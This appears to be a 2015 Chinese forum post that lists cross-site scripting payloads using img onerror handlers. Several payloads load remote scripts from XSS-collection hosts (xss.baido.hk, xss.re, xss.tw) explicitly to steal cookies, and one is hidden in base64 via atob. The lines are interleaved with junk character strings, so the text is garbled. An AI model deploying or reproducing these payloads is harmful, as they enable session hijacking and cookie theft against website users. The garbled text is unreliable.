<img src='non-exist.jpg'onerror="alert('xss')">
; ]2 t, C) i/ R0 k; V- d9 k<img src=# onerror=alert(123)>% [+ \. J2 I8 W% f) C( y6 g0 k
<img src=# onerror=alert(document.cookie)>5 T5 Z% ?* \" M k4 P0 V
下面是利用平台钓cookie的& K2 r6 o' K3 n: Y* B' n3 o
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>& q7 q" q, C, ?9 _: j! T$ R8 R
{9 X! ~4 M2 F9 u9 y
$ p9 @: d3 z7 f' a0 k) O2 H<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
* {, S& e7 c$ p2 J9 V4 N: q<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
8 s6 ]6 Z X C8 y S: F+ c& Y: z“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
& d3 U5 ]( R% ?<img src=1 onerror=jQuery.getScript("//xss.re/974")> 7 v$ I% r1 b \; m g9 v
<img src="#"># ]9 e0 k( Z( n
<img src="#">/ m) O' [ a, t6 q/ P
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
0 z- L8 H: y. p2 {3 T0 s+ |! k; P, N<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
6 m2 D9 Z6 R2 u# V1 ^9 l<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
) |$ l: t& \. Y/ N<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>( i' [3 [4 t0 @2 @4 e- w
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>- P, o' [1 `: o a' ^: @
<img src=x width="0" height="0"></img>9 r8 Q2 F e" o2 w! f
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
( _- g3 w4 M5 d# _" b+ k- o<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
% E! z4 X0 ~- _ |
发表于 2015-10-18 14:33:54
收藏
支持
反对